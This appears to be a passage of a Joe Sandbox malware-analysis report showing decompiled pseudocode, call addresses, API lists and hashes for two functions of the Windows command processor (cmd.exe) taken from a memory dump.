                                    • Instruction ID: 1e3d46453040eada4163dbbde99bddb775cd771af8901d3305254d412792885d
                                    • Opcode Fuzzy Hash: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                    • Instruction Fuzzy Hash: A401D431801654FFDF24EBE8B80CA993BADEB15319F100249F024921D9CFB006808B62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E07C0, Relevance: 9.4, APIs: 6, Instructions: 361COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 54%
                                    			E011E07C0(void* __ebx, long __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				void* _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				short _v564;
				char _v576;
				char* _v580;
				char _v1100;
				void* _v1104;
				long _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr* _v1120;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				int _t75;
				long _t78;
				signed short* _t81;
				signed short _t90;
				intOrPtr* _t91;
				short* _t96;
				char* _t97;
				intOrPtr _t100;
				intOrPtr _t103;
				wchar_t* _t104;
				long _t107;
				signed int _t108;
				signed char _t120;
				long _t121;
				wchar_t* _t126;
				int _t127;
				void* _t129;
				wchar_t* _t130;
				signed short* _t141;
				wchar_t* _t158;
				wchar_t* _t163;
				signed int _t167;
				signed int _t171;
				long _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				void* _t184;
				void* _t186;
				signed int _t187;
				int _t188;
				signed int _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t193;
				void* _t194;
				void* _t196;
				signed int _t197;
				void* _t199;
				void* _t200;

				_push(0xfffffffe);
				_push(0x11fbd98);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_t200 = _t199 - 0x450;
				_t70 =  *0x11fd0b4; // 0x2833377e
				_v12 = _v12 ^ _t70;
				_t71 = _t70 ^ _t197;
				_v32 = _t71;
				_push(__ebx);
				_push(_t71);
				 *[fs:0x0] =  &_v20;
				_t175 = __ecx;
				_v1108 = __ecx;
				_v1112 = 0;
				GetConsoleTitleW( &_v564, 0x104);
				if( *(_t175 + 0x38) == 0) {
					L88:
					_t75 = 1;
					goto L44;
				} else {
					E011E0D51( &_v1100);
					if(_v576 == 0) {
						_t78 = 0x104;
					} else {
						_t78 = 0x7fe7;
					}
					if(E011E0C70( &_v1100, _t78) < 0) {
						L87:
						E011E0DE8(_t79,  &_v1100);
						goto L88;
					} else {
						_t81 =  *(_t175 + 0x38);
						if(_t81[1] == 0x3a) {
							_t140 =  *_t81;
							if(E011E29BB( *_t81) == 0) {
								_push(0);
								_push(0xf);
								goto L83;
							} else {
								_t140 =  *( *(_t175 + 0x38));
								if(E011E6A96( *( *(_t175 + 0x38))) != 0) {
									_push(0);
									_push(GetLastError());
									L83:
									_t79 = E011DC5A2(_t140);
									goto L86;
								} else {
									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
									_t141 =  *(_t175 + 0x38);
									_t55 =  &(_t141[1]); // 0x2
									_t169 = _t55;
									do {
										_t90 =  *_t141;
										_t141 =  &(_t141[1]);
									} while (_t90 != 0);
									if(_t141 - _t169 >> 1 == 2) {
										_t91 = E011F93E2(_t187, _t169);
										goto L90;
									} else {
										goto L65;
									}
								}
							}
							goto L44;
						} else {
							_t169 =  &_v1104;
							_t189 = E011DE040(_t175,  &_v1104);
							_v1116 = _t189;
							if(_t189 == 0xffffffff) {
								L65:
								_t188 = E011DC7AA(_t175);
								goto L43;
							} else {
								if(_t189 == 0xfffffffe) {
									goto L87;
								} else {
									_t91 =  *((intOrPtr*)(0x11d1624 + (_t189 + _t189 * 2) * 8));
									_v1120 = _t91;
									if(_t91 == 0) {
										L90:
										E011E0DE8(_t91,  &_v1100);
										_t75 = 0;
										goto L44;
									} else {
										_t96 = _v580;
										if(_t96 == 0) {
											_t96 =  &_v1100;
										}
										 *_t96 = 0x2f;
										_t97 = _v580;
										if(_t97 == 0) {
											_t97 =  &_v1100;
										}
										 *((short*)(_t97 + 2)) = 0;
										if(_v580 == 0) {
											_t169 =  &_v1100;
										}
										_t130 = E011DEA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
										if(_t189 == 0xa) {
											if(_t130 == 0) {
												goto L12;
											} else {
												_t127 = wcsncmp(_t130, "/", 4);
												_t200 = _t200 + 0xc;
												if(_t127 != 0) {
													goto L14;
												} else {
													goto L12;
												}
											}
										} else {
											L12:
											if(_t189 == 0x1f) {
												L14:
												if(_t130 == 0) {
													L34:
													if(E011DE340(_t175) != 0) {
														E011E100C(_t99, _t99);
													}
													_v8 = 0;
													_t190 = _v1120;
													_push(_t175);
													if(_t190 == E011D5F50) {
														_t100 = E011D5F50();
													} else {
														if(_t190 == E011D6980) {
															_t100 = E011D6980();
														} else {
															if(_t190 == E011E2360) {
																_t100 = E011E2360();
															} else {
																if(_t190 != E011D9410) {
																	if(_t190 == E011E51B0) {
																		_t100 = E011E51B0();
																	} else {
																		 *0x12194b4();
																		_t100 =  *_t190();
																	}
																} else {
																	_t100 = E011D9410();
																}
															}
														}
													}
													_t188 = _t100;
													_v1112 = _t188;
													_v8 = 0xfffffffe;
													_t93 = E011E0BDF(_t100);
													L43:
													E011E0DE8(_t93,  &_v1100);
													_t75 = _t188;
													L44:
													 *[fs:0x0] = _v20;
													_pop(_t176);
													_pop(_t186);
													_pop(_t129);
													return E011E6FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
												} else {
													while( *_t130 != 0) {
														do {
															_t103 =  *_t191;
															_t191 = _t191 + 2;
														} while (_t103 != 0);
														_t193 = _t191 - _t155 >> 1;
														_t104 = wcschr(_t130, 0x22);
														_t200 = _t200 + 8;
														if(_t104 != 0) {
															memset(0x1213f10, 0, 0x1000 << 2);
															_t200 = _t200 + 0xc;
															_t158 = _t130;
															_t46 =  &(_t158[0]); // 0x2
															_t171 = _t46;
															do {
																_t107 =  *_t158;
																_t158 =  &(_t158[0]);
															} while (_t107 != 0);
															_t155 = _t158 - _t171 >> 1;
															_t179 = 0;
															_t108 = 0;
															if(_t155 > 0) {
																do {
																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
																	if(_t171 != 0x22) {
																		 *(0x1213f10 + _t179 * 2) = _t171;
																		_t179 = _t179 + 1;
																	}
																	_t108 = _t108 + 1;
																} while (_t108 < _t155);
															}
															_t180 = _t179 + _t179;
															if(_t180 >= 0x4000) {
																E011E711D(_t108, _t130, _t155, _t171, _t180, _t193);
																_push(_t197);
																_push(_t193);
																_push(_t180);
																_t194 = E011E0C70(0x1213ab0, ((0 |  *0x1213cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
																if(_t194 < 0) {
																	_push(_t194);
																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																	_push(0x36);
																	goto L101;
																} else {
																	_t162 =  *0x1213cb8;
																	if( *0x1213cb8 == 0) {
																		_t162 = 0x1213ab0;
																	}
																	_t194 = E011E6826(_t162,  *0x1213cc0, _v0, _a4);
																	if(_t194 < 0) {
																		_push(_t194);
																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																		_push(0x37);
																		L101:
																		E011F292C();
																	}
																}
																return _t194;
															} else {
																 *((short*)(_t180 + 0x1213f10)) = 0;
																_t169 = 0x1213f10;
																goto L20;
															}
														} else {
															_t169 = _t130;
															L20:
															_t196 = _t193 + 1;
															if(_t196 == 0 || _t196 > 0x7fffffff) {
																if(_t196 != 0) {
																	 *_t130 = 0;
																}
															} else {
																_t126 = _t130;
																_t184 = 0x7ffffffe - _t196;
																_t169 = _t169 - _t130;
																while(_t184 + _t196 != 0) {
																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
																	if(_t167 != 0) {
																		 *_t126 = _t167;
																		_t126 =  &(_t126[0]);
																		_t196 = _t196 - 1;
																		if(_t196 != 0) {
																			continue;
																		}
																	}
																	break;
																}
																if(_t196 == 0) {
																	_t126 = _t126 - 2;
																}
																_t155 = 0;
																 *_t126 = 0;
															}
															_t120 = _v1104;
															if((_t120 & 0x00000001) != 0) {
																if(_t130[0] != 0x3a) {
																	goto L29;
																} else {
																	_t155 =  *_t130;
																	if(E011E29BB( *_t130) == 0) {
																		_push(0);
																		_push(0xf);
																		goto L85;
																	} else {
																		if(_v1116 == 4) {
																			L71:
																			_t120 = _v1104;
																			goto L29;
																		} else {
																			_t155 =  *_t130;
																			if(E011E6A96( *_t130) != 0) {
																				_push(0);
																				_push(GetLastError());
																				goto L85;
																			} else {
																				goto L71;
																			}
																		}
																	}
																}
															} else {
																L29:
																if((_t120 & 0x00000002) != 0) {
																	if( *_t130 != 0x2f) {
																		goto L30;
																	} else {
																		_push(0);
																		_push(0x232a);
																		L85:
																		_t79 = E011DC5A2(_t155);
																		 *0x120b8b0 = 1;
																		L86:
																		goto L87;
																	}
																} else {
																	L30:
																	_t163 = _t130;
																	_t34 =  &(_t163[0]); // 0x2
																	_t169 = _t34;
																	do {
																		_t121 =  *_t163;
																		_t163 =  &(_t163[0]);
																	} while (_t121 != 0);
																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
																	if(_t130 != 0) {
																		continue;
																	} else {
																		break;
																	}
																}
															}
														}
														goto L102;
													}
													_t175 = _v1108;
													goto L34;
												}
											} else {
												_t169 = _t130;
												if(E011DDD2C(_t189, _t130, 1) != 0) {
													goto L87;
												} else {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L102:
			}































































                                    0x011e07c5
                                    0x011e07c7
                                    0x011e07cc
                                    0x011e07d7
                                    0x011e07d8
                                    0x011e07de
                                    0x011e07e3
                                    0x011e07e6
                                    0x011e07e8
                                    0x011e07eb
                                    0x011e07ee
                                    0x011e07f2
                                    0x011e07f8
                                    0x011e07fa
                                    0x011e0800
                                    0x011e0816
                                    0x011e0820
                                    0x011ecc7e
                                    0x011ecc7e
                                    0x00000000
                                    0x011e0826
                                    0x011e082c
                                    0x011e0838
                                    0x011ecc3d
                                    0x011e083e
                                    0x011e083e
                                    0x011e083e
                                    0x011e0851
                                    0x011ecc73
                                    0x011ecc79
                                    0x00000000
                                    0x011e0857
                                    0x011e0857
                                    0x011e085f
                                    0x011e0b1a
                                    0x011e0b24
                                    0x011ecc47
                                    0x011ecc49
                                    0x00000000
                                    0x011e0b2a
                                    0x011e0b2d
                                    0x011e0b37
                                    0x011ecc4d
                                    0x011ecc55
                                    0x011ecc56
                                    0x011ecc56
                                    0x00000000
                                    0x011e0b3d
                                    0x011e0b51
                                    0x011e0b54
                                    0x011e0b57
                                    0x011e0b57
                                    0x011e0b60
                                    0x011e0b60
                                    0x011e0b63
                                    0x011e0b66
                                    0x011e0b72
                                    0x011ecc8a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e0b72
                                    0x011e0b37
                                    0x00000000
                                    0x011e0865
                                    0x011e0865
                                    0x011e0872
                                    0x011e0874
                                    0x011e087d
                                    0x011e0b78
                                    0x011e0b7f
                                    0x00000000
                                    0x011e0883
                                    0x011e0886
                                    0x00000000
                                    0x011e088c
                                    0x011e088f
                                    0x011e0896
                                    0x011e089e
                                    0x011ecc8f
                                    0x011ecc95
                                    0x011ecc9a
                                    0x00000000
                                    0x011e08a4
                                    0x011e08a4
                                    0x011e08ac
                                    0x011ecca1
                                    0x011ecca1
                                    0x011e08b7
                                    0x011e08ba
                                    0x011e08c2
                                    0x011eccac
                                    0x011eccac
                                    0x011e08ca
                                    0x011e08d6
                                    0x011eccb7
                                    0x011eccb7
                                    0x011e08e6
                                    0x011e08eb
                                    0x011e0a68
                                    0x00000000
                                    0x011e0a6e
                                    0x011e0a76
                                    0x011e0a7c
                                    0x011e0a81
                                    0x00000000
                                    0x011e0a87
                                    0x00000000
                                    0x011e0a87
                                    0x011e0a81
                                    0x011e08f1
                                    0x011e08f1
                                    0x011e08f4
                                    0x011e0909
                                    0x011e090b
                                    0x011e09d1
                                    0x011e09da
                                    0x011e09de
                                    0x011e09de
                                    0x011e09e3
                                    0x011e09ea
                                    0x011e09f0
                                    0x011e09f7
                                    0x011e0a24
                                    0x011e09f9
                                    0x011e09ff
                                    0x011e0aef
                                    0x011e0a05
                                    0x011e0a0b
                                    0x011e0af9
                                    0x011e0a11
                                    0x011e0a17
                                    0x011e0b09
                                    0x011e0b86
                                    0x011e0b0b
                                    0x011e0b0d
                                    0x011e0b13
                                    0x011e0b13
                                    0x011e0a1d
                                    0x011e0a1d
                                    0x011e0a1d
                                    0x011e0a17
                                    0x011e0a0b
                                    0x011e09ff
                                    0x011e0a29
                                    0x011e0a2b
                                    0x011e0a31
                                    0x011e0a38
                                    0x011e0a3d
                                    0x011e0a43
                                    0x011e0a48
                                    0x011e0a4a
                                    0x011e0a4d
                                    0x011e0a55
                                    0x011e0a56
                                    0x011e0a57
                                    0x011e0a65
                                    0x011e0911
                                    0x011e0911
                                    0x011e0920
                                    0x011e0920
                                    0x011e0923
                                    0x011e0926
                                    0x011e092d
                                    0x011e0932
                                    0x011e0938
                                    0x011e093d
                                    0x011e0a98
                                    0x011e0a98
                                    0x011e0a9a
                                    0x011e0a9c
                                    0x011e0a9c
                                    0x011e0aa0
                                    0x011e0aa0
                                    0x011e0aa3
                                    0x011e0aa6
                                    0x011e0aad
                                    0x011e0aaf
                                    0x011e0ab1
                                    0x011e0ab5
                                    0x011e0ab7
                                    0x011e0ab7
                                    0x011e0abe
                                    0x011e0ac0
                                    0x011e0ac8
                                    0x011e0ac8
                                    0x011e0ac9
                                    0x011e0aca
                                    0x011e0ab7
                                    0x011e0ace
                                    0x011e0ad6
                                    0x011e0bf7
                                    0x011e0bfe
                                    0x011e0c09
                                    0x011e0c0e
                                    0x011e0c26
                                    0x011e0c2a
                                    0x011ecd24
                                    0x011ecd25
                                    0x011ecd2a
                                    0x00000000
                                    0x011e0c30
                                    0x011e0c30
                                    0x011e0c38
                                    0x011e0c5d
                                    0x011e0c5d
                                    0x011e0c4b
                                    0x011e0c4f
                                    0x011ecd2e
                                    0x011ecd2f
                                    0x011ecd34
                                    0x011ecd36
                                    0x011ecd3a
                                    0x011ecd3a
                                    0x011e0c4f
                                    0x011e0c5a
                                    0x011e0adc
                                    0x011e0ade
                                    0x011e0ae5
                                    0x00000000
                                    0x011e0ae5
                                    0x011e0943
                                    0x011e0943
                                    0x011e0945
                                    0x011e0945
                                    0x011e0948
                                    0x011ecccc
                                    0x011eccd4
                                    0x011eccd4
                                    0x011e095a
                                    0x011e095a
                                    0x011e0961
                                    0x011e0963
                                    0x011e0965
                                    0x011e096c
                                    0x011e0973
                                    0x011e0975
                                    0x011e0978
                                    0x011e097b
                                    0x011e097e
                                    0x00000000
                                    0x00000000
                                    0x011e097e
                                    0x00000000
                                    0x011e0973
                                    0x011e0982
                                    0x011eccc2
                                    0x011eccc2
                                    0x011e0988
                                    0x011e098a
                                    0x011e098a
                                    0x011e098d
                                    0x011e0996
                                    0x011e0b95
                                    0x00000000
                                    0x011e0b9b
                                    0x011e0b9b
                                    0x011e0ba5
                                    0x011ecc5d
                                    0x011ecc5f
                                    0x00000000
                                    0x011e0bab
                                    0x011e0bb2
                                    0x011e0bc4
                                    0x011e0bc4
                                    0x00000000
                                    0x011e0bb4
                                    0x011e0bb4
                                    0x011e0bbe
                                    0x011eccdc
                                    0x011ecce4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e0bbe
                                    0x011e0bb2
                                    0x011e0ba5
                                    0x011e099c
                                    0x011e099c
                                    0x011e099e
                                    0x011e0bd4
                                    0x00000000
                                    0x011e0bda
                                    0x011eccea
                                    0x011eccec
                                    0x011ecc61
                                    0x011ecc61
                                    0x011ecc66
                                    0x011ecc70
                                    0x00000000
                                    0x011ecc70
                                    0x011e09a4
                                    0x011e09a4
                                    0x011e09a4
                                    0x011e09a6
                                    0x011e09a6
                                    0x011e09b0
                                    0x011e09b0
                                    0x011e09b3
                                    0x011e09b6
                                    0x011e09c2
                                    0x011e09c5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e09c5
                                    0x011e099e
                                    0x011e0996
                                    0x00000000
                                    0x011e093d
                                    0x011e09cb
                                    0x00000000
                                    0x011e09cb
                                    0x011e08f6
                                    0x011e08f8
                                    0x011e0903
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e0903
                                    0x011e08f4
                                    0x011e08eb
                                    0x011e089e
                                    0x011e0886
                                    0x011e087d
                                    0x011e085f
                                    0x011e0851
                                    0x00000000

                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,2833377E,00000001,?), ref: 011E0816
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • towupper.MSVCRT ref: 011E0B44
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    • wcschr.MSVCRT ref: 011E0932
                                    • wcsncmp.MSVCRT(00000000,011D218C,00000004,00000002,00007FE7), ref: 011E0A76
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A06
                                      • Part of subcall function 011D6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A10
                                      • Part of subcall function 011D6980: _wcsnicmp.MSVCRT ref: 011D6A3D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A64
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A6E
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A8E
                                      • Part of subcall function 011D6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6AA0
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 011D6AC0
                                      • Part of subcall function 011D6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AD1
                                      • Part of subcall function 011D6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,00000200,00000000,00000000), ref: 011D6AE7
                                      • Part of subcall function 011D6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AF4
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011ECCDE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
                                    • String ID:
                                    • API String ID: 1803274588-0
                                    • Opcode ID: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                    • Instruction ID: 0c35c30fb05bcba58be69a9150dd9c28021f8f27148d60a098fc080ed59b1ad5
                                    • Opcode Fuzzy Hash: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                    • Instruction Fuzzy Hash: 18C10831B00A1687DB3C9FECCC9C7BE77E5AF58714F054568E90A97280EBB09991C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4800, Relevance: 9.3, APIs: 6, Instructions: 327COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E011E4800(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				int _v28;
				char _v32;
				void* _v36;
				void _v556;
				int _v564;
				char _v568;
				void* _v572;
				void _v1092;
				char _v1093;
				signed int _v1094;
				signed int* _v1100;
				signed int _v1104;
				signed int* _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t153;
				signed int _t154;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t167;
				intOrPtr* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t178;
				intOrPtr* _t186;
				void* _t190;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr* _t200;
				void* _t201;
				void* _t202;
				intOrPtr _t203;
				intOrPtr* _t204;
				signed int* _t205;
				signed int _t206;
				signed int _t211;

				_t191 = __edx;
				_t154 = _t211;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t154 + 4));
				_t209 = (_t211 & 0xfffffff8) + 4;
				_t106 =  *0x11fd0b4; // 0x2833377e
				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
				_t200 =  *((intOrPtr*)(_t154 + 0xc));
				_t196 = 0;
				_v564 = 0x104;
				_v1093 = __edx;
				_v1116 = __ecx;
				 *0x1213cf0 = 0;
				_v572 = 0;
				_v568 = 1;
				memset( &_v1092, 0, 0x104);
				_v36 = 0;
				_v32 = 1;
				_v28 = 0x104;
				memset( &_v556, 0, 0x104);
				_t156 =  &_v1092;
				if(E011E0C70( &_v1092, 0x7fe9) < 0) {
					L74:
					if(_v1093 == 0) {
						L14:
						_t196 = 1;
						L15:
						__imp__??_V@YAXPAX@Z(_v36);
						__imp__??_V@YAXPAX@Z(_v572);
						_pop(_t198);
						_pop(_t201);
						return E011E6FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
					}
					_push(_t196);
					_push(0x2374);
					L13:
					E011DC5A2(_t156);
					goto L14;
				}
				_t156 =  &_v556;
				if(E011E0C70( &_v556, 0x7fe9) < 0) {
					goto L74;
				}
				_t163 = 0x30;
				_t164 = E011E00B0(_t163);
				_v1108 = _t164;
				if(_t164 == 0) {
					L47:
					E011F9287(_t164);
					__imp__longjmp(0x120b8b8, 1);
					L48:
					_t165 = 0x1213ab0;
					L17:
					E011E0D89(_t191, _t165);
					E011E5D39();
					_t202 = _v572;
					_t167 = _t202;
					if(_t202 == 0) {
						_t167 =  &_v1092;
					}
					_t191 = _t167 + 2;
					do {
						_t123 =  *_t167;
						_t167 = _t167 + 2;
					} while (_t123 != _t196);
					_t156 = _t167 - _t191 >> 1;
					_v1104 = _t156;
					if(_t156 <= 3) {
						L24:
						if(_t156 + 1 > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(2);
							goto L13;
						}
						_t203 = _v1120;
						_t125 =  *(_t203 + 0x10);
						if( *( *(_t203 + 0x10)) == _t196) {
							_t125 = "*";
						}
						E011E0D89(_t191, _t125);
						_t170 = _v36;
						if(_t170 == 0) {
							_t170 =  &_v556;
						}
						_t191 = _t170 + 2;
						do {
							_t127 =  *_t170;
							_t170 = _t170 + 2;
						} while (_t127 != _t196);
						_t156 = _t170 - _t191 >> 1;
						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(0x6f);
							goto L13;
						}
						if( *( *(_t203 + 0x10)) == _t196) {
							L33:
							_t172 = _v36;
							if(_v36 == 0) {
								_t172 =  &_v556;
							}
							_t132 = E011E297B(_t172);
							_t204 = _v1100;
							 *_t204 = _t132;
							_t173 = _v572;
							if(_v572 == 0) {
								_t173 =  &_v1092;
							}
							_t133 = E011E297B(_t173);
							 *((intOrPtr*)(_t204 + 4)) = _t133;
							_t205 = _v1108;
							if(_t205[1] != _t196) {
								__imp___wcsicmp(_t205[1], _t133);
								if(_t133 == 0) {
									_t205[2] = _t205[2] + 1;
									_t176 = _v1100;
									goto L38;
								}
								_t164 = 0x30;
								_t205 = E011E00B0(_t164);
								if(_t205 == 0) {
									goto L47;
								}
								_v1108 = _t205;
								 *_v1108 = _t205;
								_t143 = E011E297B(_v1100[1]);
								_t176 = _v1100;
								_t205[1] = _t143;
								 *_t205 = _t196;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								_t205[2] = 1;
								goto L37;
							} else {
								_t145 = E011E297B(_t133);
								_t176 = _v1100;
								_t205[1] = _t145;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								L37:
								_t205[3] = _t176;
								_t205[4] = _t144;
								L38:
								_t191 = _v1116;
								_t135 = _v1112 + 1;
								_t177 =  *(_t176 + 0xc);
								_v1112 = _t135;
								_v1100 = _t177;
								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
									goto L15;
								}
								L4:
								_t206 =  *_t177;
								_t192 = _t206;
								_v1104 = _t206;
								_t178 = _t192 + 2;
								do {
									_t136 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t136 != _t196);
								_t191 = _t192 - _t178 >> 1;
								_t137 = E011E3121(_t206, _t192 - _t178 >> 1);
								_v1094 = _t137;
								if(_t137 != 0) {
									L8:
									_v1100[2] = _t137;
									if( *((char*)(_t154 + 8)) != 0) {
										_t191 = _t137;
										_t206 = E011E4DB8(_t206, _t137);
										E011E0040(_v1104);
									}
									_t156 = _t206;
									 *0x1213cf0 = _t196;
									_t138 = E011E3B5D(_t206, _t191);
									_v1120 = _t138;
									if(_t138 != 1) {
										_t165 =  *0x1213cb8;
										if( *0x1213cb8 == 0) {
											goto L48;
										}
										goto L17;
									} else {
										if(_v1093 == 0) {
											goto L14;
										}
										_push(_t196);
										_push( *0x1213cf0);
										goto L13;
									}
								}
								_t156 =  *0x1213cf0;
								if(_t156 != 0) {
									if(_v1093 == 0) {
										goto L14;
									}
									_push(_t196);
									_push(_t156);
									goto L13;
								}
								goto L8;
							}
						}
						_t146 =  *((intOrPtr*)(_t203 + 0x14));
						if(_t146 == 0 ||  *_t146 == _t196) {
							_t186 = _v36;
							if(_t186 == 0) {
								_t186 =  &_v556;
							}
							_t191 = _t186 + 2;
							do {
								_t147 =  *_t186;
								_t186 = _t186 + 2;
							} while (_t147 != _t196);
							_t148 = (_t186 - _t191 >> 1) + 3;
							if(_v1094 != 0) {
								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
									E011E0CF2(_t191, L".*");
								}
							}
						}
						goto L33;
					}
					if(_v1094 != 0) {
						_t190 = _t202;
						if(_t202 == 0) {
							_t190 =  &_v1092;
						}
						if( *((short*)(E011D5846(_t190))) != 0x2e) {
							_t156 = _v1104;
							goto L22;
						} else {
							if(_t202 == 0) {
								_t202 =  &_v1092;
							}
							_t156 = _v1104;
							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
							goto L24;
						}
					}
					L22:
					if(_t202 == 0) {
						_t202 =  &_v1092;
					}
					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
					goto L24;
				}
				_t153 = _v1116;
				 *_t200 = _t164;
				_t191 = 1;
				 *_t164 = 0;
				 *((intOrPtr*)(_t164 + 4)) = 0;
				 *((intOrPtr*)(_t164 + 8)) = 1;
				_t177 = _t153 + 0x4c;
				_v1112 = 1;
				_v1100 = _t177;
				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
					goto L15;
				}
				goto L4;
			}





























































                                    0x011e4800
                                    0x011e4803
                                    0x011e4805
                                    0x011e4806
                                    0x011e4811
                                    0x011e4815
                                    0x011e481d
                                    0x011e4824
                                    0x011e4828
                                    0x011e4832
                                    0x011e4834
                                    0x011e4840
                                    0x011e4848
                                    0x011e484e
                                    0x011e4854
                                    0x011e485a
                                    0x011e4861
                                    0x011e4869
                                    0x011e4871
                                    0x011e4875
                                    0x011e4881
                                    0x011e4889
                                    0x011e489b
                                    0x011eea9e
                                    0x011eeaa5
                                    0x011e498b
                                    0x011e498d
                                    0x011e498e
                                    0x011e4991
                                    0x011e499e
                                    0x011e49aa
                                    0x011e49ad
                                    0x011e49b9
                                    0x011e49b9
                                    0x011eeaab
                                    0x011eeaac
                                    0x011e4984
                                    0x011e4984
                                    0x00000000
                                    0x011e498a
                                    0x011e48a6
                                    0x011e48b3
                                    0x00000000
                                    0x00000000
                                    0x011e48bb
                                    0x011e48c1
                                    0x011e48c3
                                    0x011e48cb
                                    0x011ee940
                                    0x011ee940
                                    0x011ee94c
                                    0x011ee952
                                    0x011ee952
                                    0x011e49ca
                                    0x011e49d1
                                    0x011e49d6
                                    0x011e49db
                                    0x011e49e1
                                    0x011e49e5
                                    0x011ee95c
                                    0x011ee95c
                                    0x011e49eb
                                    0x011e49ee
                                    0x011e49ee
